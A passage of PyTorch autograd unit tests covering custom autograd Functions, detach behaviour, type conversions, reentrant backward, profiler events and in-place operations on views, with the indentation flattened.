@staticmethod
def backward(ctx, g):
return g
x = torch.zeros(1, requires_grad=True)
y = MyFunction.apply(x)
y.backward()
y.grad_fn.metadata
g = y.grad_fn
del y
g.metadata # this currently fails, but shouldn't
def test_naughty_autograd_function_stashing_ctx(self):
saved_ctx = []
class Id(Function):
@staticmethod
def forward(ctx, x):
ctx.save_for_backward(x)
return x
@staticmethod
def backward(ctx, grad_x):
saved_ctx.append(ctx)
return ctx.saved_tensors
p = torch.zeros(1, requires_grad=True)
loss = Id.apply(p)
loss.backward(retain_graph=True)
del loss
# At this point in time, it complains that the graph has been freed
# (which indeed true, although a somewhat indirect way of stating the
# problem).
self.assertRaises(RuntimeError, lambda: saved_ctx[0].saved_tensors)
def test_custom_autograd_repeated_grad_grad(self):
# This test failed the equality check in PR #22983; it's an interesting
# and different test case worth enshrining. mult1 is not testing
# anything that interesting, but mult2 is the interesting case.
def mult1(x):
return x.prod(dim=-1).prod(dim=-1)
class Mult(torch.autograd.Function):
@staticmethod
def forward(ctx, x):
y = mult1(x)
ctx.save_for_backward(x, y)
return y
@staticmethod
def backward(ctx, grad_output):
x, y = ctx.saved_tensors
return (grad_output * y)[:, None, None] / x
mult2 = Mult.apply
def check_gradgrad_repeated(x, y):
gy, = torch.autograd.grad(y[0], x, create_graph=True)
ggy_1, = torch.autograd.grad(gy[0, 0, 0], x, retain_graph=True)
gy, = torch.autograd.grad(y[0], x, create_graph=True)
ggy_2, = torch.autograd.grad(gy[0, 0, 0], x, retain_graph=True)
self.assertEqual(ggy_1[0, 0, 1], ggy_2[0, 0, 1])
x = torch.ones(2, 4, 4).requires_grad_()
check_gradgrad_repeated(x, mult1(x))
check_gradgrad_repeated(x, mult2(x))
def test_custom_autograd_no_early_free(self):
# This test failed complaining that buffers had already been freed
# prior to #22983. Also pretty interesting test case.
class Double(torch.autograd.Function):
@staticmethod
def forward(ctx, x):
y = x ** 2
ctx.save_for_backward(x, y)
return y
@staticmethod
def backward(ctx, grad_output):
x, _ = ctx.saved_tensors
return grad_output * 2 * x
# this is equivalent, but uses the output of .forward() in .backward()
class Double2(Double):
@staticmethod
def backward(ctx, grad_output):
x, y = ctx.saved_tensors
return grad_output * 2 * y / x
double = Double.apply
double2 = Double2.apply
x = torch.tensor(2).double().requires_grad_()
self.assertTrue(gradcheck(double, x))
self.assertTrue(gradgradcheck(double, x))
self.assertTrue(gradcheck(double2, x))
self.assertTrue(gradgradcheck(double2, x))
y = double(x)
torch.autograd.grad(y, x, create_graph=True)
torch.autograd.grad(y, x)
y = double2(x)
torch.autograd.grad(y, x, create_graph=True)
torch.autograd.grad(y, x) # should not error!
def test_detach(self):
x = torch.randn(10, 10, requires_grad=True)
y = x + 2
y = y.detach()
z = y * 4 + 2
self.assertFalse(y.requires_grad)
self.assertFalse(z.requires_grad)
x = torch.randn(10, 10, requires_grad=True)
y = x * 2
y = y.detach()
self.assertFalse(y.requires_grad)
self.assertIsNone(y.grad_fn)
z = x + y
z.sum().backward()
# This is an incorrect gradient, but we assume that's what the user
# wanted. detach() is an advanced option.
self.assertEqual(x.grad, torch.ones(10, 10))
# in-place detach
x = torch.randn(10, 10, requires_grad=True)
y = torch.randn(10, 10, requires_grad=True)
a = x * 2
(y + a).sum().backward(retain_graph=True)
a.detach_()
self.assertFalse(a.requires_grad)
(y + a).sum().backward() # this won't backprop to x
self.assertEqual(x.grad, torch.ones(10, 10) * 2)
self.assertEqual(y.grad, torch.ones(10, 10) * 2)
# in-place deatch on a view raises an exception
view = x.narrow(0, 1, 4)
self.assertRaisesRegex(RuntimeError, 'view', lambda: view.detach_())
def test_detach_base(self):
"detaching base does not detach view"
x = torch.randn(10, 10, requires_grad=True)
view = x.narrow(0, 1, 4)
x.detach_()
self.assertFalse(x.requires_grad)
self.assertTrue(view.requires_grad)
self.assertIsNotNone(view.grad_fn)
self.assertIs(view._base, x)
def test_detach_then_inplace_raises_in_autograd(self):
x = torch.randn([], requires_grad=True)
orig_x = x.detach().clone()
y = x ** 2 # saves x
z = x.detach()
z.zero_()
with self.assertRaisesRegex(RuntimeError, "has been modified by an inplace"):
y.backward()
def test_detach_disallows_metadata_change(self):
x = torch.randn([], requires_grad=True)
detached = x.detach()
with self.assertRaisesRegex(
RuntimeError, "not allowed on a Tensor created from .data or .detach()"):
detached.resize_(3, 3)
def _test_type_conversion_backward(self, t, ):
fvar = Variable(t(torch.randn(5, 5).float()), requires_grad=True)
fvar.double().sum().backward()
self.assertEqual(fvar.grad, torch.ones_like(fvar))
self.assertEqual(type(fvar.grad), type(fvar))
dvar = Variable(t(torch.randn(5, 5).double()), requires_grad=True)
dvar.float().sum().backward()
self.assertEqual(dvar.grad, torch.ones_like(dvar))
self.assertEqual(type(dvar.grad), type(dvar))
def test_type_conversions(self):
x = torch.randn(5, 5)
self.assertIsInstance(x.float(), torch.FloatTensor)
self.assertIsInstance(x.int(), torch.IntTensor)
if torch.cuda.is_available():
self.assertIsInstance(x.float().cuda(), torch.cuda.FloatTensor)
self.assertIsInstance(x.int().cuda(), torch.cuda.IntTensor)
self.assertIsInstance(x.int().cuda().cpu(), torch.IntTensor)
if torch.cuda.device_count() >= 2:
x2 = x.float().cuda(1)
self.assertIsInstance(x2, torch.cuda.FloatTensor)
self.assertIs(x2.get_device(), 1)
x2 = x.float().cuda()
self.assertIsInstance(x2, torch.cuda.FloatTensor)
self.assertIs(x2.get_device(), 0)
x2 = x2.cuda(1)
self.assertIsInstance(x2, torch.cuda.FloatTensor)
self.assertIs(x2.get_device(), 1)
y = Variable(torch.randn(5).cuda(1), requires_grad=True)
y.cpu().sum().backward()
self.assertIs(y.grad.get_device(), 1)
self.assertIs(y.long().get_device(), 1)
for t in [torch.DoubleTensor, torch.FloatTensor, torch.IntTensor, torch.ByteTensor]:
for y_var in (True, False):
y = torch.randint(5, (5, 5), dtype=t.dtype)
y = Variable(y) if y_var else y
self.assertIsInstance(x.type(t), t)
self.assertIsInstance(x.type_as(y), t)
# TODO: t.dtype should work
t_dtype = t().dtype
self.assertIsInstance(x.type(t_dtype), t)
self.assertIs(t_dtype, x.type(t_dtype).dtype)
self.assertEqual(y.data_ptr(), y.type(t).data_ptr())
if torch.cuda.is_available():
for x_cuda in (True, False):
for y_cuda in (True, False):
x_c = x.cuda() if x_cuda else x
y_c = y.cuda() if y_cuda else y
_, y_type = y_c.type().rsplit('.', 1)
y_typestr = ('torch.cuda.' if y_cuda else 'torch.') + y_type
self.assertEqual(y_c.type(), x_c.type(y_typestr).type())
self.assertIs(y_c.dtype, x_c.type(y_c.dtype).dtype)
self.assertEqual(y_c.data_ptr(), y_c.cuda().data_ptr() if y_cuda else y_c.data_ptr())
self._test_type_conversion_backward(lambda x: x)
if torch.cuda.is_available():
self._test_type_conversion_backward(lambda x: x.cuda())
if torch.cuda.device_count() >= 2:
# one of these has to be the non-default device
self._test_type_conversion_backward(lambda x: x.cuda(0))
self._test_type_conversion_backward(lambda x: x.cuda(1))
def test_isolated_node(self):
x = torch.randn(5, 5, requires_grad=True)
y = torch.randn(5, 5, requires_grad=True)
a = x + y
b = torch.max(a, 1, True)[1].repeat(1, 5).double()
o = (b + a).sum()
o.backward()
def test_shape(self):
x = torch.randn(3, 4)
self.assertEqual(2, len(x.shape))
self.assertEqual(x.shape[0], 3)
self.assertEqual(x.shape[1], 4)
def test_numpy_requires_grad(self):
x = torch.randn(2, 2, requires_grad=True)
err_msg_outputs = r"Can't call numpy\(\) on Tensor that requires grad. Use tensor.detach\(\).numpy\(\) instead."
with self.assertRaisesRegex(RuntimeError, err_msg_outputs):
x.numpy()
with torch.no_grad():
x.numpy()
x = torch.randn(2, 2)
x.numpy()
with torch.no_grad():
x.numpy()
def test_return_leaf(self):
class Identity(Function):
@staticmethod
def forward(ctx, a, b):
return a, a + b
@staticmethod
def backward(ctx, grad_a, grad_b):
return grad_a + grad_b, grad_b
hook_called = [False]
x = torch.randn(5, 5, requires_grad=True)
y = torch.randn(5, 5, requires_grad=True)
q, p = Identity.apply(x, y)
# Make sure hooks only receive grad from usage of q, not x.
def hook(grad):
hook_called[0] = True
self.assertEqual(grad, torch.ones(5, 5))
q.register_hook(hook)
(q + p + x).sum().backward()
self.assertEqual(x.grad, torch.ones(5, 5) * 3)
self.assertEqual(y.grad, torch.ones(5, 5))
self.assertTrue(hook_called[0])
def test_return_leaf_inplace(self):
class Inplace(InplaceFunction):
@staticmethod
def forward(ctx, a, b):
ctx.mark_dirty(a)
return a.add_(b), b + 2
@staticmethod
def backward(ctx, grad_a, grad_b):
return grad_a, grad_a + grad_b
x = torch.randn(5, 5)
y = torch.randn(5, 5, requires_grad=True)
q, p = Inplace.apply(x, y)
self.assertIs(q, x)
self.assertIs(q.grad_fn.__class__, Inplace._backward_cls)
self.assertTrue(q.requires_grad)
q.sum().backward()
self.assertEqual(y.grad, torch.ones(5, 5))
def test_leaf_assignment(self):
x = torch.randn(5, 5)
y = torch.randn(5, requires_grad=True)
z = torch.randn(5, requires_grad=True)
x[0] = y
x[1] = 2 * z
self.assertTrue(x.requires_grad)
self.assertIsNot(x.grad_fn, None)
x.sum().backward()
self.assertEqual(y.grad, torch.ones(5))
self.assertEqual(z.grad, torch.ones(5) * 2)
def test_no_grad_assignment(self):
x = torch.randn(5, 5, requires_grad=True)
y = torch.randn(5)
with torch.no_grad():
x[0] = y
self.assertTrue(x.requires_grad)
self.assertIsNone(x.grad_fn)
def test_no_grad_modifies_version(self):
x = torch.randn(5, requires_grad=True)
y = torch.randn(5, requires_grad=True)
z = (x * y).sum()
with torch.no_grad():
x *= 2
self.assertRaisesRegex(RuntimeError, 'modified by an inplace operation',
lambda: z.backward())
def test_no_grad_input(self):
class MyFunction(Function):
@staticmethod
def forward(self, x):
return x
@staticmethod
def backward(self, grad_output):
return grad_output
x = torch.randn(5, requires_grad=True)
with torch.no_grad():
y = MyFunction.apply(x)
self.assertTrue(x.requires_grad)
self.assertIsNone(y.grad_fn)
def test_backward_copy(self):
# This tests checks backward engine for a very subtle bug that appreared
# in one of the initial versions of autograd. Gradients tensors were
# simply stored in lists while the function waited for all its gradients
# to be computed. However, sometimes an output was used multiple times,
# so the gradients needed to be summed. Engine used to keep a need_copy
# set of tensors that will need a clone upon next addition and removed
# them from the set as soon as the clone was performed. However, this
# could lead to incorrect results if the same gradient tensor was
# buffered in three places in the graph:
# 1. When accumulating gradients in one of these places it was cloned
# and removed from need_copy set.
# 2. When accumulating in second place, it wasn't in the need_copy set,
# so the gradients were simply accumulated in-place (which already
# modified the grad in 3rd place)
# 3. When accumulating in the third place, it wasn't in the need_copy set
# as well, so the incoming gradient was summed in-place, yielding
# incorrect results in all functions, except the first one.
x = torch.ones(5, 5, requires_grad=True)
y = torch.ones(5, 5, requires_grad=True)
# Simulate that we're in the middle of the graph
a = x + 2
b = y + 2
c = x + 2
# This op will just return grad_output two times in backward
add1 = a + b
add2 = add1 + c
# Simulate a long branch, so grad_output will get buffered.
for _ in range(4):
a = a * 2
b = b * 2
c = c * 2
branch = a + b + c
out = add2 + branch
# expected gradients are:
# for x: 34 (16 from final a, 16 from final c, 2 from add2)
# for y: 17 (16 from final b, 1 from add2)
grad_output = torch.ones(5, 5)
out.backward(grad_output)
self.assertEqual(x.grad, torch.ones(5, 5) * 34)
self.assertEqual(y.grad, torch.ones(5, 5) * 17)
def test_save_none_for_backward(self):
test_case = self
class MyFn(Function):
@staticmethod
def forward(ctx, input):
ctx.save_for_backward(None, input, None)
return input * input
@staticmethod
def backward(ctx, grad_output):
n1, input, n2 = ctx.saved_tensors
test_case.assertIsNone(n1)
test_case.assertIsNone(n2)
return 2 * input * grad_output
x = torch.randn(5, 5, requires_grad=True)
y = MyFn.apply(x)
y.sum().backward()
self.assertEqual(x.grad, 2 * x)
def test_too_many_grads(self):
class MyFn(Function):
@staticmethod
def forward(ctx, input):
return input
@staticmethod
def backward(ctx, grad_output):
return grad_output, None, None
x = torch.randn(5, 5, requires_grad=True)
y = MyFn.apply(x)
y.sum().backward()
self.assertEqual(x.grad, torch.ones_like(x))
def test_pickle(self):
x = torch.randn(10, 10, requires_grad=True)
y = torch.randn(10, 10, requires_grad=False)
def assert_strict_equal(var1, var2):
self.assertEqual(var1, var2)
self.assertEqual(var1.requires_grad, var2.requires_grad)
serialized = [pickle.dumps([x, y], protocol=p) for p in range(3)]
for dump in serialized:
xc, yc = pickle.loads(dump)
assert_strict_equal(xc, x)
assert_strict_equal(yc, y)
def test_dep_nograd(self):
class F1(Function):
@staticmethod
def forward(ctx, input):
out = torch.randn(input.size())
ctx.mark_non_differentiable(out)
return input, out
@staticmethod
def backward(ctx, grad_output, ignored):
return grad_output
class F2(Function):
@staticmethod
def forward(ctx, input, ignored):
return input
@staticmethod
def backward(ctx, grad_output):
return grad_output, None
x = torch.randn(5, requires_grad=True)
a, b = F1.apply(x)
b = b + 1 # separate F1 from F2 by another op
self.assertTrue(a.requires_grad)
self.assertFalse(b.requires_grad)
c = F2.apply(a, b)
c.backward(torch.ones(c.size()))
self.assertEqual(x.grad, torch.ones(x.size()))
def test_set_grad_enabled(self):
x = torch.tensor([1.], requires_grad=True)
with torch.set_grad_enabled(False):
y = x * 2
self.assertFalse(y.requires_grad)
with torch.set_grad_enabled(True):
y = x * 2
self.assertTrue(y.requires_grad)
with torch.set_grad_enabled(False):
torch.set_grad_enabled(True)
y = x * 2
self.assertTrue(y.requires_grad)
def test_simple_reentrant(self):
y_data = torch.randn(2, 2)
class Reenter(Function):
@staticmethod
def forward(ctx, x):
with torch.enable_grad():
ctx.x = Variable(x, requires_grad=True)
ctx.y = Variable(y_data, requires_grad=True)
ctx.output_var = ctx.x * ctx.y
return ctx.output_var.detach()
@staticmethod
def backward(ctx, grad_output):
with torch.enable_grad():
ctx.output_var.sum().backward()
return ctx.x.grad * grad_output
# Reentrant starts on CPU thread, finishs on GPU thread
x = torch.randn(2, 2, requires_grad=True)
out = Reenter.apply(x)
out.sum().backward()
self.assertEqual(x.grad, y_data)
def test_reentrant_child_error(self):
# Parent graph.
a = torch.rand(3, 3, requires_grad=True)
c = a * a
# Reentrant child graph.
b = torch.rand(3, 3, requires_grad=True)
e = b * b
f = TestAutograd.SimulateBackwardError.apply(e)
reentrant_root = f.sum()
class ReentrantFunc(Function):
@staticmethod
def forward(ctx, inp):
return inp.clone()
@staticmethod
def backward(ctx, grad):
# Reentrant backward in child will throw an error.
reentrant_root.backward()
return grad
d = ReentrantFunc.apply(c)
with self.assertRaisesRegex(Exception, 'Simulate error'):
d.sum().backward()
def test_var_mean_differentiable(self):
dim = [2, 4]
keepdim = False
input1 = torch.randn(3, 4, 5, 6, 2, 3, requires_grad=True)
input2 = deepcopy(input1)
var1, mean1 = torch.var_mean(input1, dim=dim, keepdim=keepdim)
var2 = input2.var(dim=dim, keepdim=keepdim)
mean2 = input2.mean(dim=dim, keepdim=keepdim)
grad = torch.randn(3, 4, 6, 3, requires_grad=True)
r1 = var1 * var1 * mean1 * mean1
r2 = var2 * var2 * mean2 * mean2
self.assertEqual(r1, r2, rtol=0.01, atol=0.0)
torch.autograd.backward(r1, grad)
torch.autograd.backward(r2, grad)
self.assertEqual(input1.grad, input2.grad, rtol=0.01, atol=0.0)
@skipIfNoLapack
def test_lobpcg(self):
def func(k, A, largest=True, B=None):
X_shape = list(A.shape)
X_shape[-1] = k
X = torch.eye(A.size(-2), k, dtype=A.dtype, device=A.device)
if A.dim() > 2:
X = X.expand(X_shape)
D, U = torch.lobpcg(A=A, k=k, B=B, X=X, largest=largest)
# LOBPCG uses a random initial eigenspace approximation
# if parameter `X` is not provided.
# This may cause a non-deterministic behavior
# when it comes to the sign of an eigenvector
# (note if v is an eigenvector, so is -v),
# hence we eliminate this non-determinism
# by making sure that each column of U
# gets multiplied by the sign of its max (in absolute value) element.
# Also, gradcheck changes the content of the input by +/- eps (default to 1e-06)
# to compute the numerical gradient which can also cause the signs to flip.
_, idx = U.abs().max(-2, keepdim=True)
sign = U.gather(-2, idx).sign()
U = U * sign
return D, U
# TODO: review if this can be ported to OpInfos or moved to test_linalg.py
def run_symeig_test(k, sizes, largest=True):
A = torch.rand(*sizes).double()
A = (A @ A.mT) / 10
A.requires_grad_(True)
gradcheck(lambda A: func(k, A, largest), A, check_batched_grad=False)
# Custom gradient vectors for better stability due to some
# non-determinism in the lobpcg's forward.
# Note it is not required if symeig is in forward instead (tested).
D_grad = torch.rand(*A.shape[:-2], k) / 100
U_grad = torch.rand(*A.shape[:-1], k) / 100
gradgradcheck(lambda A: func(k, A, largest), A, [D_grad, U_grad], atol=1e-4, check_batched_grad=False)
# check whether A.grad is symmetric
A = A.detach().requires_grad_(True)
D, U = func(k, A, largest)
(D.sum() + U.sum()).backward()
self.assertEqual(A.grad, A.grad.mT)
for largest in [True, False]:
run_symeig_test(1, (6, 6), largest=largest)
run_symeig_test(1, (2, 6, 6), largest=largest)
run_symeig_test(1, (2, 2, 6, 6), largest=largest)
run_symeig_test(2, (6, 6), largest=largest)
run_symeig_test(2, (2, 6, 6), largest=largest)
run_symeig_test(2, (2, 2, 6, 6), largest=largest)
run_symeig_test(3, (9, 9), largest=largest)
run_symeig_test(3, (2, 9, 9), largest=largest)
run_symeig_test(3, (2, 2, 9, 9), largest=largest)
def test_variable_traverse(self):
def get_out_and_unrefed_cycle():
inp = torch.randn(10, requires_grad=True)
tmp = inp.view(10, 1)
out = tmp.view(10)
# Create a reference cycle that contains an
# intermediary Variable in the graph
my_list = []
my_list.append(tmp)
my_list.append(my_list)
return out
out = get_out_and_unrefed_cycle()
gc.collect()
# This will segfault if things have been erroneously released
out.backward(torch.randn(out.size()))
# TODO: review porting these to OpInfo tests
def test_pow_zero_tensor_gradient(self):
def run_test(input_size, exponent):
input = torch.zeros(*input_size, requires_grad=True)
input.pow(exponent).sum().backward()
self.assertEqual(input.grad.abs().sum(), 0)
run_test((10,), torch.zeros(10))
run_test((10, 10), torch.zeros(10, 10))
run_test((10,), 0)
def test_profiler(self):
x = torch.randn(10, 10)
with profile(use_kineto=kineto_available()) as p:
self.assertTrue(torch.autograd._profiler_enabled())
y = x * 2 + 4
self.assertFalse(torch.autograd._profiler_enabled())
names = ['aten::mul', 'aten::add']
found_indices = set()
for evt in p.function_events:
if evt.name in names:
found_indices.add(names.index(evt.name))
self.assertEquals(len(found_indices), len(names))
def test_profiler_seq_nr(self):
with profile(use_kineto=kineto_available()) as p:
x = torch.randn(10, 10, requires_grad=True)
y = torch.randn(10, 10, requires_grad=True)
z = x + y
s = z.sum()
s.backward()
print(p.key_averages().table(
sort_by="self_cpu_time_total", row_limit=-1))
# expecting aten::add, aten::sum to have the sequence numbers,
# expecting the corresponding backward nodes to have the same numbers
# as the forward ops
add_seq_nr = -1
sum_seq_nr = -1
found_add = found_sum = False
found_bwd_add = found_bwd_sum = False
found_empty = False
for e in p.function_events:
# Ignore record_function user scope.
if "autograd::engine::evaluate_function" in e.name:
continue
if e.name == "aten::add":
add_seq_nr = e.sequence_nr
self.assertFalse(found_add)
found_add = True
elif e.name == "aten::sum":
sum_seq_nr = e.sequence_nr
self.assertFalse(found_sum)
found_sum = True
elif "Add" in e.name and "Backward" in e.name:
self.assertEqual(e.sequence_nr, add_seq_nr)
self.assertFalse(found_bwd_add)
found_bwd_add = True
elif "Sum" in e.name and "Backward" in e.name:
self.assertEqual(e.sequence_nr, sum_seq_nr)
self.assertFalse(found_bwd_sum)
found_bwd_sum = True
# check that nested ops (e.g. empty) don't have
# sequence number
if e.name == "aten::empty":
self.assertEqual(e.sequence_nr, -1)
found_empty = True
self.assertGreaterEqual(add_seq_nr, 0)
self.assertGreaterEqual(sum_seq_nr, 0)
self.assertNotEqual(add_seq_nr, sum_seq_nr)
self.assertTrue(found_add)
self.assertTrue(found_sum)
self.assertTrue(found_bwd_add)
self.assertTrue(found_bwd_sum)
self.assertTrue(found_empty)
def test_profiler_unboxed_only(self):
x = torch.rand(3, 4)
with torch.autograd.profiler.profile(use_kineto=kineto_available()) as prof:
x.resize_([3, 2])
def test_profiler_propagation(self):
def foo(x):
with record_function("in_foo") as rf:
return x * 2
x = torch.rand(3, 4)
traced_foo = torch.jit.trace(foo, x)
def bar(x):
with record_function("in_bar") as rf:
# we expect that profiler will be able
# propagate across fork
fut = torch.jit._fork(traced_foo, x)
y = torch.jit._wait(fut)
# note: continuation (and rf's end) can
# be executed in a different thread
with record_function("in_bar_after_wait") as rf2:
y = y * 2
return y
traced_bar = torch.jit.trace(bar, x)
with profile(use_kineto=kineto_available()) as p:
traced_bar(x)
found_foo = False
found_bar = False
found_bar_after_wait = False
for info in p.function_events:
if info.name == "in_foo":
self.assertFalse(found_foo)
found_foo = True
elif info.name == "in_bar":
self.assertFalse(found_bar)
found_bar = True
elif info.name == "in_bar_after_wait":
self.assertFalse(found_bar_after_wait)
found_bar_after_wait = True
self.assertTrue(found_foo)
self.assertTrue(found_bar)
self.assertTrue(found_bar_after_wait)
def test_record_function_callbacks(self):
x = torch.randn(10, 10)
with profile(use_kineto=kineto_available()) as p:
with record_function("foo"):
y = x * 2 + 4
function_events = p.function_events
foo_event = [event for event in function_events if "foo" in event.name][0]
self.assertEqual(foo_event.count, 1)
def test_profiler_aggregation_fake(self):
events = EventList()
id = [0]
def get_id():
id[0] = id[0] + 1
return id[0]
# [[thread_id, [(start, end, id), ....]], ...]
# Using list instead of a dict so order is guaranteed for any Python
# version
threads = [
[1, [(0, 1, get_id()), (1, 2, get_id())]],
[0, [(0, 2, get_id()), (1, 2, get_id()), (1, 3, get_id())]],
]
for thread, ranges in threads:
for range in ranges:
assert(len(range) == 3)
events.append(
FunctionEvent(
id=range[2],
node_id=0,
name="",
thread=thread,
start_us=range[0],
end_us=range[1],
)
)
events._populate_cpu_children()
# Note that [1, 3] pushes out [0, 2] first. Then we record [1, 2]
# as a child of [1, 3]
res = [[], [], [], [], [4]]
def get_children_ids(event):
return [child.id for child in event.cpu_children]
assert([get_children_ids(event) for event in events] == res)
def test_profiler_aggregation_table(self):
"""
Test if the profiling result is aggregated for `str(prof)`
See: https://github.com/pytorch/pytorch/issues/37500
"""
x = torch.randn(1024)
with torch.autograd.profiler.profile(use_kineto=kineto_available()) as prof:
torch.einsum("i->", x)
prof_str = str(prof)
prof_table = prof.table()
self.assertEqual(prof_table, prof_str)
def test_profiler_function_event_avg(self):
avg = FunctionEventAvg()
avg.add(FunctionEvent(id=0, node_id=0, name="foo", thread=0, start_us=10, end_us=15))
avg.add(FunctionEvent(id=1, node_id=0, name="foo", thread=0, start_us=20, end_us=30))
avg.add(avg)
self.assertEqual(avg.key, "foo")
# aggregate stats
self.assertEqual(avg.count, 4)
self.assertEqual(avg.cpu_time_total, 30)
self.assertEqual(avg.self_cpu_time_total, 30)
self.assertEqual(avg.cuda_time_total, 0)
# average stats
self.assertEqual(avg.cpu_time, 7.5)
self.assertEqual(avg.cuda_time_total, 0)
def test_profiler_shapes(self):
print("")
layer1 = torch.nn.Linear(20, 30)
layer2 = torch.nn.Linear(30, 40)
input = torch.randn(128, 20)
with profile(record_shapes=True, use_kineto=kineto_available()) as prof:
layer2(layer1(input))
print(prof.function_events)
linear_expected_shapes = [
[[128, 20], [30, 20], [30]],
[[128, 30], [40, 30], [40]],
]
found_indices = set()
for event in prof.function_events:
if event.name == "aten::linear":
self.assertTrue(event.input_shapes in linear_expected_shapes)
found_indices.add(linear_expected_shapes.index(event.input_shapes))
self.assertEqual(len(found_indices), len(linear_expected_shapes))
def test_profiler_aggregation_lstm(self):
print("")
rnn = torch.nn.LSTM(10, 20, 2)
total_time_s = 0
with profile(record_shapes=True, use_kineto=kineto_available()) as prof:
for i in range(20):
input = torch.randn(5, 3, 10)
h = torch.randn(2, 3, 20)
c = torch.randn(2, 3, 20)
start = time.time()
rnn(input, (h, c))
end = time.time()
total_time_s += end - start
print(prof.table(
sort_by="self_cpu_time_total", row_limit=10, header="TEST"))
print(prof.key_averages(group_by_input_shape=True).table(
sort_by="self_cpu_time_total", row_limit=10))
print(prof.table(
sort_by="self_cpu_time_total", row_limit=10, max_src_column_width=300, header="TEST", top_level_events_only=True))
print(prof.key_averages(group_by_input_shape=True).table(
sort_by="self_cpu_time_total", row_limit=10, top_level_events_only=True))
total_time_us = total_time_s * 1000.0 * 1000.0 # make it us which is profiler default
print(
"Total time based on python measurements: ",
_format_time(total_time_us)
)
print(
"CPU time measurement python side overhead: {:.2f}%".format(
(total_time_us / prof.self_cpu_time_total - 1.0) * 100.0
)
)
if sys.platform != "win32":
with tempfile.NamedTemporaryFile() as trace_file:
prof.export_chrome_trace(trace_file.name)
def test_record_function(self):
x = torch.randn(10, 10)
def forward(x):
with record_function("outer"):
y = x * 2 + 4
with record_function("inner"):
y = y - 1
y = y / 1
forward(x)
with profile(use_kineto=kineto_available()) as p:
forward(x)
events = p.function_events
important_events = [
'outer',
'aten::mul',
'aten::add',
'inner',
'aten::sub',
'aten::div'
]
idx = 0
for info in events:
if info.name == important_events[idx]:
idx = idx + 1
if idx == len(important_events):
break
self.assertEqual(idx, len(important_events))
# We can also use record_function to decorate arbitrary function
@record_function('my_func')
def f(x, y):
return x + y
with profile(use_kineto=kineto_available()) as p:
f(1, 2)
self.assertTrue('my_func' in str(p))
def test_record_function_multithreaded(self):
rf = record_function("outer")
rf.__enter__()
with record_function("inner"):
# test that exiting the record function after starting another one
# doesn't throw.
rf.__exit__(None, None, None)
with record_function("inner"):
rf.__enter__()
# test that exiting the record function after ending another one
# doesn't throw.
rf.__exit__(None, None, None)
def test_dir(self):
x = torch.randn(10, 10)
keys = dir(x)
self.assertIn('shape', keys)
# real and imag are only implemented for complex tensors.
y = torch.randn(10, 10, dtype=torch.cfloat)
imag_key = 'imag'
self.assertRaises(RuntimeError, lambda: hasattr(x, imag_key))
self.assertTrue(hasattr(y, imag_key))
keys.remove(imag_key)
for key in keys:
self.assertTrue(hasattr(x, key))
def test_inplace_on_view_saved_output(self):
# Test an in-place operation on a view in which the in-place op saves
# its output. Previously, this created a reference cycle.
dealloc = [0]
class IncrementOnDelete(object):
def __del__(self):
dealloc[0] += 1
def test():
root = torch.randn(3, 3, requires_grad=True)
copy = root.clone()
copy.grad_fn.register_hook(IncrementOnDelete())
view = copy.view(9)
torch.nn.functional.relu(view, inplace=True)
test()
self.assertEqual(dealloc[0], 1)
def test_inplace_on_view_leaf_errors(self):
# Issue #21875: Fail faster (when we try to modify the view vs. in backward())
x = torch.zeros(1, requires_grad=True)
y = x.view_as(x)
with self.assertRaisesRegex(RuntimeError,
"a view of a leaf Variable that "
"requires grad is being used in "
"an in-place operation."):
y.add_(1)
def test_inplace_on_view_backward(self):
# Issue #10532: Make sure that this does not raise RuntimeError.
net = nn.Sequential(
nn.InstanceNorm2d(2),
nn.ReLU(True)
)
x = torch.tensor([[[[1.0, 1.0]]]], requires_grad=True)
g, = torch.autograd.grad(net(x).pow(2), [x], grad_outputs=x.new_ones(x.shape) , create_graph=True)
torch.autograd.grad(g.sum(), [x])
self.assertEqual(x, torch.tensor([[[[1.0, 1.0]]]]))
# https://discuss.pytorch.org/t/freeing-buffer-strange-behavior/31955/8
inputs = torch.ones((1, 3, 256, 256), requires_grad=True)
tmp1 = (inputs + 1).view_as(inputs)
tmp2 = torch.nn.functional.threshold(tmp1, 0., 0., True)
prob_interpolated = torch.sigmoid(tmp2)
gradients = torch.autograd.grad(outputs=prob_interpolated, inputs=inputs,
grad_outputs=torch.ones(prob_interpolated.size()),
create_graph=True, retain_graph=True)[0]
gradient_penalty = gradients.sum()
gradient_penalty.backward()
fn = gradient_penalty.grad_fn.next_functions[0][0].next_functions[1][0]
self.assertEqual(fn.name(), "ThresholdBackwardBackward0")
def test_inplace_on_view_weak_grad_fn(self):
# Issue 23502: Test that b's grad_fn is preserved.
a = torch.arange(10.0, requires_grad=True)
b = a.narrow(0, 0, 2).clone().view(-1)
b.relu_()
c = b.clone()
del b
gc.collect()
s = c.sum()
s.backward()
self.assertEqual(s, torch.tensor(1.0))
# Issue #21875: Fail faster (when we try to modify the view vs. in backward())
a = torch.rand(10, requires_grad=True).narrow(0, 0, 10)
with self.assertRaises(RuntimeError):
b = a.relu_()
def test_out_variant_raises_when_inputs_require_grad(self):
a = torch.randn(2, 2, requires_grad=True)
b = torch.randn(2, 2, requires_grad=True)
x = torch.zeros_like(a)
# out=... functions don't support automatic differentiation currently
self.assertRaisesRegex(RuntimeError, 'out=', lambda: torch.mul(a, b, out=x))
# the inputs can require grad if we're in no_grad() mode
with torch.no_grad():
torch.mul(a, b, out=x)
self.assertEqual(x, a * b)
a = torch.randn(2, 2)
b = torch.randn(2, 2)
x = torch.zeros(2, 2, requires_grad=True)
# we should throw an exception if the output requires grad
self.assertRaisesRegex(RuntimeError, 'out=', lambda: torch.mul(a, b, out=x))
# TODO: see if this test can be OpInfo'd or moved to diagonal's test suite
def test_diagonal_derivative_requires_grad(self):
# test that the backward requires grad
# we do this is because diagonal_backward uses inplace
# operations and gradgradcheck does not catch whether
# they works as expected (it will succeed even if
# the gradient has requires_grad == False
a = torch.randn(5, 6, requires_grad=True)
b = torch.diagonal(a)**2
c = b.sum()
d, = torch.autograd.grad(c, a, retain_graph=True, create_graph=True)
self.assertTrue(d.requires_grad)
def test_anomaly_detect_nan(self):
size = 10
class MyFunc(Function):
@staticmethod
def forward(ctx, inp1, inp2, fail_0th):
ctx.fail_0th = fail_0th
return inp1.sum(0, keepdim=True)
@staticmethod
def backward(ctx, gO):
gI = gO.clone().expand(size)
gI[0] = 0
gI[0] /= 0 # Generate a nan
if ctx.fail_0th:
return gI, None, None
else:
return None, gI, None
inp = torch.rand(size, requires_grad=True)
out = MyFunc.apply(inp, inp, True)
out.backward() # Should not fail
inp = torch.rand(size, requires_grad=True)
